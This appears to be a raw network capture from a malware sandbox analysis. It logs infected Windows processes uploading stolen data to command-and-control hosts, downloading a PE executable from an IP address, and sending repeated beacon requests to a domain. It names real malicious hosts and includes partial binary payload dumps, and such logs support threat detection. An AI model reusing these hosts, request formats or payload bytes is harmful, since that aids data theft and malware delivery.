                                                                                                                                                                                                                                        Sep 21, 2024 14:48:55.411319017 CEST2472OUTData Raw: d8 43 8a 17 28 d7 29 50 e4 97 bf 65 76 4d b4 0d 67 cd 7a 2f cd cf d5 e2 27 02 f6 8e 2c 72 8c b6 db 1b cb b5 a7 19 b1 2b 32 f3 c9 93 40 a8 5a b2 d1 27 72 f0 c8 ed 89 cd b6 d0 23 ef 97 a8 ac 8c 57 fc 1e cc 90 0a ac 34 4f cd fb 8f 60 ff 9a 34 b4 d0
                                                                                                                                                                                                                                        Data Ascii: C()PevMgz/',r+2@Z'r#W4O`4[b;tfo5E~,*o y<DL;*W:^J0lXF=Oh:\;]CAKz(/85(+#|GmLM'KQQk):bn,B
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:55.411437988 CEST2472OUTData Raw: 84 d5 62 1a 21 52 5f d8 47 50 fa 83 d4 5e 9f 01 a8 08 9b 42 66 9b 34 6d 2a 96 fe 1c 3b a9 95 1c a7 3c d9 32 ed a3 8e 11 91 27 c9 f5 9f 1e ab 22 71 ba 08 ca 52 e6 39 ac d7 bb 08 72 5e 37 47 77 25 79 0e 1d 1d 5f d2 68 62 c0 eb 69 9e 3d bc 22 ab 13
                                                                                                                                                                                                                                        Data Ascii: b!R_GP^Bf4m*;<2'"qR9r^7Gw%y_hbi="|9nFTUpVSh;*krQYD"S6L4g,c!E`.we+%>E[- l$L2}nsr=;hdS"_$T?FC^~IHE(
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:56.341326952 CEST209INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:56 GMT
                                                                                                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                        Content-Length: 2
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                                                                                                                        Data Raw: 4f 4b
                                                                                                                                                                                                                                        Data Ascii: OK


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        20192.168.2.9497645.53.124.195807932C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:06.469652891 CEST337OUTPOST /v1/upload.php HTTP/1.1
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----Boundary41747459
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Content-Length: 32239
                                                                                                                                                                                                                                        Host: tventyvf20pt.top
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:06.469712019 CEST11124OUTData Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 34 31 37 34 37 34 35 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 51 61 72
                                                                                                                                                                                                                                        Data Ascii: ------Boundary41747459Content-Disposition: form-data; name="file"; filename="Qareliw.bin"Content-Type: application/octet-stream2 w~ U /i*mH*h|`sI,ZP@<>i9"Q mB\y<vQy&tHM(~V
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:06.474510908 CEST1236OUTData Raw: 46 c6 2d 9e 49 88 05 28 a2 76 9f e1 23 b2 19 1e 80 0a 4e 21 91 b7 4b 71 a7 43 e1 25 a1 48 7a 49 06 b8 7d 31 e1 8e 46 16 65 f2 55 fe d2 d8 07 2d 65 4f 86 f7 40 fd 3d ac 36 bb 4e b3 e1 6f a7 28 d3 29 a9 ef 26 9b b6 39 e4 6a dc 73 cd de 04 98 fd c7
                                                                                                                                                                                                                                        Data Ascii: F-I(v#N!KqC%HzI}1FeU-eO@=6No()&9jsQk$j+V[.BzZ2Th|?+,l!(t%>Hdz/oVf+n}g~N^$1)8RUBsE~vn-<s8 ]
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:06.474628925 CEST2472OUTData Raw: 1d e2 0b 2f c7 a6 d5 be 55 b8 d1 23 76 e3 20 92 88 dd bc c9 d6 08 a0 cf 28 35 7c 39 c1 17 c1 8f eb 3d a5 43 49 2c 76 ce f0 5e 5b df f5 78 10 0b 98 ac 31 e1 2b e7 89 6c 7a cf 7f 3c f9 cb de 74 d6 f7 91 8a ee e4 1f 98 da dc 63 57 69 ac fa 73 7f a2
                                                                                                                                                                                                                                        Data Ascii: /U#v (5|9=CI,v^[x1+lz<tcWis_=0V.8Sm86H]D/v3M,VMQ7\CvN<3Wh}"^o,mVvvo}b4kdnu_]fFZLicTN
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:06.474684954 CEST4944OUTData Raw: af d4 7c 7e e6 2c 44 65 41 aa 22 be 5d 18 71 7b 77 5e 6d 84 f7 48 c5 00 4f 81 b2 c7 a8 42 54 bd 73 e9 d2 3b 9e 79 0f 5f 3a 44 fd 36 c0 76 ae 14 2f 34 f4 79 b2 61 10 89 a2 87 91 12 ce d3 1f fc 91 9f 73 d6 be b1 41 20 d5 62 52 ed 85 73 b9 3d e7 e2
                                                                                                                                                                                                                                        Data Ascii: |~,DeA"]q{w^mHOBTs;y_:D6v/4yasA bRs=3KJ:Qpf<BPod ^)'KmR>C8O'1tAly{zio'{KkAB0MT=,"[c1/Je)N"_I/ErmeNU(pzWvz
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:06.474798918 CEST2472OUTData Raw: 05 b5 93 47 bc 24 d0 f7 68 cb 68 cf 93 47 39 a7 df 23 a7 2d 53 c6 46 29 2d 6b c6 6d f3 70 bd ed 1d 65 e2 55 ea be ca 11 c8 a8 b2 fb cd 19 c2 ce 5b 43 66 ab 2e 48 83 56 8d 5a c5 f3 ca cb 25 80 65 87 60 00 40 24 14 3e e3 2d 9d 47 84 68 77 10 77 a9
                                                                                                                                                                                                                                        Data Ascii: G$hhG9#-SF)-kmpeU[Cf.HVZ%e`@$>-Ghww9{Y5II[(g'K;.\s$_)h}KJ[/!h^4G-!p1"$#Lr\@C(gx,d(zQqfHLAN%ZCP
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:06.474813938 CEST4944OUTData Raw: 9b 03 21 9d 8b 92 29 b2 cb 79 0a 75 54 a5 09 8d 71 f6 77 3e 83 34 8b eb ec 74 3d e2 0c 3d 67 be ce 32 7d ac 0e 95 84 dd 71 cd ca 92 65 e1 8b 20 f6 a2 8a 0a fd 1a 94 85 6b 9e 78 ad 4c e8 26 7c a3 4e 45 6f bd 1b 26 2e ce 09 d3 56 39 7d 63 ec 3b 2c
                                                                                                                                                                                                                                        Data Ascii: !)yuTqw>4t==g2}qe kxL&|NEo&.V9}c;,7M #Y/W3Y!]o1GQI$RG;_4{Wi\>u^>u2w@OIt>bYQ<miRc \g2dHI,f-&[=
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:06.477449894 CEST5047OUTData Raw: 13 c7 10 5a 56 8a af f8 58 93 b8 cf 7f 59 dc 8b 37 c0 2a 33 98 01 42 99 e9 b7 0d 7d 3b e8 e8 98 80 ae 63 4e 14 61 ee d1 35 a0 f6 77 71 25 21 0c d5 b6 c6 e3 e3 b2 1f 19 19 65 0b 36 bf 2f 43 c8 f8 af d7 eb 7d 2a a7 6b b9 ad 0e 22 06 c9 1d 85 3f 82
                                                                                                                                                                                                                                        Data Ascii: ZVXY7*3B};cNa5wq%!e6/C}*k"?g`uj`hkE>L<uM`><S{yf/gL2Gjp15**3-JIxHYe>:$G,kKf?p(*M4Jf0n4}>NnugT
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:07.617567062 CEST209INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:07 GMT
                                                                                                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                        Content-Length: 2
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                                                                                                                        Data Raw: 4f 4b
                                                                                                                                                                                                                                        Data Ascii: OK
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:07.617718935 CEST209INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:07 GMT
                                                                                                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                        Content-Length: 2
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                                                                                                                        Data Raw: 4f 4b
                                                                                                                                                                                                                                        Data Ascii: OK


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        21192.168.2.949776147.45.44.104807436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:30.053076982 CEST194OUTGET /prog/66ecb454d2b4a_lgfdsjgds.exe HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: 147.45.44.104
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:30.781898975 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:30 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 363424
                                                                                                                                                                                                                                        Last-Modified: Thu, 19 Sep 2024 23:31:32 GMT
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Keep-Alive: timeout=120
                                                                                                                                                                                                                                        ETag: "66ecb454-58ba0"
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6e b2 ec 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 32 05 00 00 08 00 00 00 00 00 00 7e 51 05 00 00 20 00 00 00 60 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2c 51 05 00 4f 00 00 00 00 60 05 00 d0 05 00 00 00 00 00 00 00 00 00 00 78 65 05 00 28 26 00 00 00 80 05 00 0c 00 00 00 f4 4f 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELnf2~Q `@ `,QO`xe(&O H.text1 2 `.rsrc`4@@.reloc:@B`QHAVeOz?Z#btHxK+,57>1G2%ju-EmRU-6W4bW5>B] sf'(o}kPq>j][T.sp}HT-o8.^pK7?ntEK>^8p+bW{:SjZzd2i65u|vUy1#6P}$K\X$ZDXqK^I>Ljv-H-KEG)r
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:30.781938076 CEST1236INData Raw: b2 43 8e 2c 79 2d 5e 36 8d b2 90 cf f2 d9 15 8d 12 89 0b 18 7e 4d 4a 29 8b 27 c0 ea d3 0f 4b a4 cb 09 9b 22 70 d5 35 b8 f3 cb 39 f6 9a de 41 af 93 30 89 d5 97 73 43 55 c3 db 3d a6 ec 1f e1 03 ef 9c f7 46 59 79 b1 b1 19 42 0c b5 77 eb d9 c9 7e b0
                                                                                                                                                                                                                                        Data Ascii: C,y-^6~MJ)'K"p59A0sCU=FYyBw~JqF:Yt;<b2D/.r}q~PcS)4&/cWHJ\q%QEdIjh*^*qYaadn/ny)w,HDQ<(Z}hkUkr.4"lB@
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:30.781959057 CEST448INData Raw: d1 ea e2 69 68 04 00 07 2e 7b 9a 13 7f a0 9e f6 8c a3 e5 14 6c cf 9c 83 27 93 93 4d bc 34 a7 7e 03 9a 25 6b 69 d6 c4 34 a6 7d 78 60 05 f7 6c 13 19 6f 27 9b ff 7d 6e 23 06 a6 ad 17 73 f5 1a 56 33 5b 94 e3 e1 c8 9e a8 b6 23 a4 dd 50 ee 95 03 5d a2
                                                                                                                                                                                                                                        Data Ascii: ih.{l'M4~%ki4}x`lo'}n#sV3[#P]HHPOUL\R43sAKQzO7+h.Kdj};].1t8L)lz:[N34\H+J.rJ::|!cK^ILi{4q9hT
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:30.781971931 CEST1236INData Raw: 38 f0 57 c6 d3 12 bd 38 73 76 7b 6d 9e b4 38 0a ce b7 9a 22 c0 5a 88 e3 26 ab c7 47 b4 3a 7a c4 d8 c9 08 47 fb ad ff 47 b8 97 9f b4 98 91 c2 6f 40 c8 0b cf dd 42 a5 c6 50 5b 7c 04 e9 8b db d3 a3 54 81 56 ff 18 4a ca 81 df f5 ca 6d 84 16 8a 40 97
                                                                                                                                                                                                                                        Data Ascii: 8W8sv{m8"Z&G:zGGo@BP[|TVJm@pKWEHjH12Ox$qM)H"N[N,ZV)=dSt53$h2o;4'2wf*^0$Bh"Z
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:30.781984091 CEST1236INData Raw: 6a b2 4d 61 13 6d 01 61 3c 5b a5 02 52 d6 fd c8 f0 c7 17 5d 8a 38 36 a1 23 67 46 43 c0 8e fc aa 05 46 45 d1 68 93 e3 84 94 9c dc c1 e4 4f a4 86 0e bd a0 6b e2 30 ca 32 8b 53 02 7b d2 ca 74 02 c2 9c c5 6a b8 32 cb c4 e6 2d 28 d8 69 47 8b c4 71 2a
                                                                                                                                                                                                                                        Data Ascii: jMama<[R]86#gFCFEhOk02S{tj2-(iGq*}px{6w4D~\_ssI/p$J`ClbR6oS]&pE$0>TB<9;yIEo@0'=GBp~4baql'I"
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:30.781996965 CEST1236INData Raw: 1a 4f f1 ed e3 5a e0 b2 58 58 e0 67 bf 55 38 cc 49 e2 2f d3 4e 16 14 cf f3 b6 c8 e6 9d 34 44 97 81 25 ad 11 f1 62 8b c9 83 39 ea 9d 85 69 76 7c 8d 64 81 df 2b e1 8a 14 82 d3 ff 64 42 e0 be df ac 2b 54 0e 9a 4d 27 aa 61 2b 46 45 15 ab aa 03 5e 62
                                                                                                                                                                                                                                        Data Ascii: OZXXgU8I/N4D%b9iv|d+dB+TM'a+FE^b0]CU$OWek`@&l2#q7]0Yl`e.q(:gH!Pp+[S56T{1`lTR;rs[.q .bXH**Bc7y
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:30.782008886 CEST1236INData Raw: 46 fa 0c 05 9f 83 b2 75 b9 a2 07 9d e6 b0 d6 4b c2 2c 31 76 cb 10 a4 bd 32 de 57 97 75 00 db 8a df 33 b9 85 4a f2 c3 ef 7f d7 84 d9 e9 ac d6 aa 14 c9 4c d3 3e 16 d6 64 89 26 9e d0 26 ed 2b 54 eb 35 29 42 c7 ec 4e 6b 12 87 c3 f9 f8 41 60 c3 6f 07
                                                                                                                                                                                                                                        Data Ascii: FuK,1v2Wu3JL>d&&+T5)BNkA`ol'Xl)y4_37gxTu,qi#+}}jxbVyKm;@KJ{l[`EJwyHg"cE;%^@[n~{`t<2%n_7?
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:30.782021999 CEST1236INData Raw: 65 01 fd c7 76 6f 39 bf d4 a9 92 17 9f a0 db 0d ea 52 ee 22 a1 32 07 97 9a a8 70 c2 bf 88 6e 00 a7 2a 95 d6 36 0e c3 e9 28 64 14 ce 7c 75 29 7b e6 6d 6e 58 1b 52 3e 90 80 bc 6b df d5 2d 6d 13 ab 0e 84 32 1d 85 6a 04 37 96 30 3b 28 ac d9 55 28 98
                                                                                                                                                                                                                                        Data Ascii: evo9R"2pn*6(d|u){mnXR>k-m2j70;(U(_pW9j"H,WX%4#L10XMByP:*t+Zk^P}@&I%=EbTcny[|JKtvry3oVK-
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:30.782035112 CEST1236INData Raw: 31 e0 3d 1c ea f2 9c 9c 77 f0 66 7f 4c 03 33 63 6b c3 0c 63 9c b6 c8 56 f9 61 17 15 c0 ea a0 6b 90 f1 54 92 a8 3b 2f 5c 72 29 51 87 5b 77 a4 c6 19 db a1 65 a5 f6 64 00 82 a2 64 d7 d1 cc 46 06 e6 e0 72 bb 16 d3 3d 44 f1 0f 11 c5 b2 3e 56 70 cc 2d
                                                                                                                                                                                                                                        Data Ascii: 1=wfL3ckcVakT;/\r)Q[weddFr=D>Vp-8\zE#SU4[="~kU*^3LH%P5Yv`Q{8y6m{?|d?`,%&&`{B{g(glu(oZ=
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:30.782046080 CEST1236INData Raw: 74 3b 6f d1 14 11 96 68 29 79 7d b0 4b 94 a3 6c 30 db e3 41 e4 64 bb ff 94 f0 d1 4b 9d b8 94 4f 0e 7b df a2 e2 a4 d8 0b ff 02 0f 82 7b 8d ea 82 7f f7 0a d9 c6 a1 c4 a9 ef 1f 48 75 5d 0e df de 8c 9e 2a 07 a7 9b 0b ee 3d 5d 9b 49 6a db 26 9f f2 c2
                                                                                                                                                                                                                                        Data Ascii: t;oh)y}Kl0AdKO{{Hu]*=]Ij&[6ZR#@8afKGQS+]-o'zJG-N&&;P:b7KwK`RxO.{FuDEe/':!&Pf|YU`:m{R6
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:30.782062054 CEST1236INData Raw: 41 51 19 17 4c 63 99 a3 6b b3 a7 b6 e2 f2 17 bb 03 44 46 7f 7b 41 27 3a 9c 8a 10 d0 ce 98 25 8a a1 6e d1 4e 50 87 49 4c 72 fb 11 20 92 67 7b 0c 6b 62 9f 69 52 dd 5e 86 bc e7 28 40 76 17 be 5a 24 bc 27 84 47 0d 02 f1 fe 36 db 47 f3 64 ca 38 7f ff
                                                                                                                                                                                                                                        Data Ascii: AQLckDF{A':%nNPILr g{kbiR^(@vZ$'G6Gd8in]jH70q<&MV7,iqTv-}~fI&.r1xu/b.ws%5! =_C;E-flQg?"Yju|X<


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                        22192.168.2.94977892.119.114.16980
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:34.159703970 CEST18OUTData Raw: ad da ba ab 06 00 00 00 16 27 00 00 1a 15 10 1c 17 0d
                                                                                                                                                                                                                                        Data Ascii: '
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:34.717413902 CEST36INData Raw: ad da ba ab 18 00 00 00 12 27 00 00 3e 40 21 14 41 12 4f 3f 0f 3b 20 3e 32 18 1b 3e 36 0c 12 0d 55 4d 32 0d
                                                                                                                                                                                                                                        Data Ascii: '>@!AO?; >2>6UM2
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:34.777734041 CEST76INData Raw: ad da ba ab 40 00 00 00 17 27 00 00 1b 48 4c 1b 1d 1b 49 18 4d 1d 4e 1f 4b 4f 4c 1a 1f 4d 1c 1d 4e 1a 4d 4f 4f 4f 41 1f 4d 1a 18 4b 4d 4e 4a 4d 4e 1a 18 4b 1a 1c 4d 18 4e 4f 41 40 1a 1b 41 1d 1b 1b 4b 4c 41 4f 4a 1f 4b 40 4d 18
                                                                                                                                                                                                                                        Data Ascii: @'HLIMNKOLMNMOOOAMKMNJMNKMNOA@AKLAOJK@M
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:35.201200008 CEST12OUTData Raw: ad da ba ab 00 00 00 00 14 27 00 00
                                                                                                                                                                                                                                        Data Ascii: '
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:35.378941059 CEST23INData Raw: ad da ba ab 0b 00 00 00 15 27 00 00 41 57 4d 4f 57 48 4b 4a 57 4a 4a
                                                                                                                                                                                                                                        Data Ascii: 'AWMOWHKJWJJ
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:38.531502962 CEST12OUTData Raw: ad da ba ab 00 00 00 00 10 27 00 00
                                                                                                                                                                                                                                        Data Ascii: '
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:39.152760029 CEST12INData Raw: ad da ba ab 00 00 00 00 11 27 00 00
                                                                                                                                                                                                                                        Data Ascii: '


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        23192.168.2.949782185.196.8.214802036C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:37.187833071 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:37.889983892 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:37 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        24192.168.2.949783185.196.8.214802036C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:39.028721094 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:39.706784964 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:39 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        25192.168.2.94978445.132.206.251807436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:39.068356037 CEST281OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----GCGDGHCBGDHJJKECAECB
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: cowod.hopto.org
                                                                                                                                                                                                                                        Content-Length: 3577
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:39.068396091 CEST3577OUTData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 44 47 48 43 42 47 44 48 4a 4a 4b 45 43 41 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 64 38 65 66
                                                                                                                                                                                                                                        Data Ascii: ------GCGDGHCBGDHJJKECAECBContent-Disposition: form-data; name="token"b7d8ef1d8933f25474cb615d1ce026a4------GCGDGHCBGDHJJKECAECBContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------GCGDGHCBGDHJJK
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:39.736877918 CEST362INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:39 GMT
                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                        Content-Length: 166
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Location: https://cowod.hopto.org/
                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        26192.168.2.949785185.196.8.214802036C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:39.967276096 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:40.763262987 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:40 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


